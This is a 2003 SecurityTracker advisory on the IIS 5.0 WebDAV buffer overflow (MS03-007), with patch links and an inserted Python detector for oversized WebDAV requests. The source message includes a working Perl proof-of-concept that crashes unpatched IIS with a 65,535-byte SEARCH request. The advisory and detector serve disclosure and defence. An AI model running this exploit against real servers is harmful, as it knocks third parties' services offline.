SecurityTracker.com
SecurityTracker Archives

Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server
Vendors:   Microsoft
(Additional Exploit Code is Available) Re: Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1006371
SecurityTracker URL:  http://securitytracker.com/id/1006371
CVE Reference:   CVE-2003-0109
Date:  Mar 24 2003
Impact:   Execution of arbitrary code via network, Root access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 5.0
Description:   A buffer overflow vulnerability was reported in Microsoft Internet Information Server (IIS) in its World Wide Web Distributed Authoring and Versioning (WebDAV) protocol implementation. A remote user could execute arbitrary code with Local System privileges. Systems running on Windows 2000 are vulnerable.

A remote user can send a specially crafted HTTP header to the server to trigger the buffer overflow and execute arbitrary code. The code will run in the Local System security context, giving the remote user full control of the system.

The buffer overflow reportedly resides in ntdll.dll, used by the IIS WebDAV component.

IIS installations on Windows NT, XP, and Windows Server 2003 are reportedly not affected. IIS 4.0 reportedly does not have WebDAV enabled by default.

CERT reported in advisory CA-2003-09 that an exploit for this flaw has been publicly circulated.

Infowarfare.dk has provided a demonstration exploit script that will crash an affected server. The script is provided in the Source Message.

[Editor's note: See the Message History for important information about an additional exploit and about the applicability of this flaw to Windows 2000 in general.]

Impact:   A remote user can execute arbitrary code on the system in the security context of the IIS service. By default, IIS runs in the LocalSystem context.
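As an added defender-side example (not part of the advisory or of the posted script), the following Python checks captured HTTP requests for the shape described above: a WebDAV method such as SEARCH carrying an abnormally long request URI. The WebDAV method list and the 1024-byte threshold are assumptions, and the sample requests are constructed.

```python
"""Flag WebDAV requests whose URI is long enough to be suspicious (the MS03-007 request shape)."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# WebDAV verbs served by the IIS WebDAV component (assumption: the common RFC 2518 set).
WEBDAV_METHODS = {"SEARCH", "PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK", "COPY", "MOVE"}
# No legitimate DAV path is this long; the threshold is an assumption, not a vendor value.
MAX_URI_LEN = 1024

@dataclass
class Finding:
    method: str
    uri_len: int
    reason: str

def parse_request_line(raw: bytes) -> Optional[Tuple[str, bytes, str]]:
    """Split the first line of a raw HTTP request into (method, uri, version); None if malformed."""
    first, _, _ = raw.partition(b"\r\n")
    parts = first.split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return None
    return parts[0].decode("ascii", "replace"), parts[1], parts[2].decode("ascii", "replace")

def check_request(raw: bytes, max_uri_len: int = MAX_URI_LEN) -> Optional[Finding]:
    """Return a Finding for an oversized WebDAV URI or a malformed request line, else None."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return Finding("?", len(raw), "malformed request line")
    method, uri, _ = parsed
    if method in WEBDAV_METHODS and len(uri) > max_uri_len:
        return Finding(method, len(uri), f"WebDAV {method} with {len(uri)}-byte URI")
    return None

def scan_requests(requests: List[bytes]) -> List[Finding]:
    """Run check_request over a batch of captured requests and keep the hits."""
    return [f for f in (check_request(r) for r in requests) if f is not None]

# Constructed samples: a benign PROPFIND, a plain GET, and a request shaped like the posted PoC.
SAMPLE_REQUESTS = [
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: 127.0.0.1\r\nDepth: 1\r\n\r\n",
    b"GET /index.html HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n",
    b"SEARCH /" + b"A" * 65535 + b" HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-type: text/xml\r\n\r\n",
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding)
```

The same check applies to the cs-method and cs-uri-stem fields of IIS W3C logs, where an unusually long SEARCH or PROPFIND stem is the artifact to look for after the fact.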
Solution:   The vendor has released the following patch.

For all versions of Windows 2000 except Japanese NEC:

http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en

For Japanese NEC:

http://microsoft.com/downloads/details.aspx?FamilyId=FBCF9847-D3D6-4493-8DCF-9BA29263C49F&displaylang=ja

Microsoft indicates that the patch can be installed on Windows 2000 SP2 or SP3. Microsoft plans to include this fix in Windows 2000 SP4.

A reboot of your system is required after installing the patch.

Microsoft has released Knowledge Base article 815021 regarding this issue, available at:

http://support.microsoft.com/default.aspx?scid=kb;en-us;815021

Microsoft has described several workarounds and tools in their advisory that can be used to mitigate this flaw, available at:

http://www.microsoft.com/technet/security/bulletin/MS03-007.asp

Vendor URL:  www.microsoft.com/technet/security/bulletin/MS03-007.asp
Cause:   Boundary error
Underlying OS:  Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Mar 17 2003 Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code

Source Message Contents

Subject:  WebDav - IIS 5.0 - MS03-007

-------- Original Message --------
Subject: WebDav - IIS 5.0 - MS03-007
Date: Mon, 24 Mar 2003 17:30:22 +0100
From: matrix@infowarfare.dk
To: "bugs@securitytracker.com" <bugs@securitytracker.com>, "news@securiteam.com"
<news@securiteam.com>, "vuln@secunia.com" <vuln@secunia.com>, "vulnwatch@vulnwatch.org"
<vulnwatch@vulnwatch.org>

#!/usr/bin/perl -w
#
# Tested on :
#	    W2K SP3 + the fix -> IIS issues an error
#	    W2K SP3 -> IIS temporarily crashes
#	    W2K SP2 -> IIS temporarily crashes
#	    W2K SP1 -> IIS does not crash, but issues a message
#		       about an internal error
#
#	    W2K     -> IIS does not crash, but issues a message about
#		       an internal error
#
# Microsoft Security Bulletin MS03-007
#
# DISCLAIMER:
# The information in this bulletin is provided "AS IS" without warranty of any kind.
# In no event shall we be liable for any damages whatsoever including direct, indirect,
# incidental, consequential, loss of business profits or special damages.
#
#  Coded by Matrix - www.infowarfare.dk
#
#  If you put a debugger on the Inetinfo process you can see the result,
#  And sorry about the code could be much more nice, but fuck, it works =)
#

use strict;
use IO::Socket;
use LWP::Simple;


# Globals Go Here.
my $host;		# Host being probed.
my $port;		# Webserver port.
my $Buffer;		# A x 65535
my $Host_Header;	# Fixed request headers (declared here so the script compiles under "use strict").
my $XMLShit;		# XML Request

$Buffer  = "A" x 65535;
$Host_Header = "Host: 127.0.0.1\r\nContent-type: text/xml\r\nContent-Length: 133\r\n";
$XMLShit = "<?xml version=\"1.0\"?> \r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n";


# SUBROUTINES GO HERE.
&intro;
&scan;
&exit; # Play safe with this .

sub intro {
&host;

sleep 3;
};

# host subroutine.
sub host {
system('cls');
print "\n WebDAV OverFlow for IIS 5.0 by Matrix.";
print "\n http://www.infowarfare.dk";
print "\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "\n Host : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\n Port : ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};	# end host subroutine.


# scan subroutine.
sub scan {
print "\n\n";
print "\nIIS 5.0 WebDAV BufferOverflow attack - $host on port $port ...";
print "\n";
&connect;
};

# Connect subroutine.
sub connect {
my $connection = IO::Socket::INET->new(Proto =>"tcp",
                                PeerAddr =>$host,
                                PeerPort =>$port) || die "Could not connect to $host \n";

$connection -> autoflush(1);
# It is here we put it all together and Flush the Buffer
print $connection "SEARCH /$Buffer HTTP/1.1\r\n$Host_Header\r\n$XMLShit\r\n";
close $connection;
};  # end connect subroutine.

# exit subroutine.
sub exit{
print "\n\n\n";
exit;
};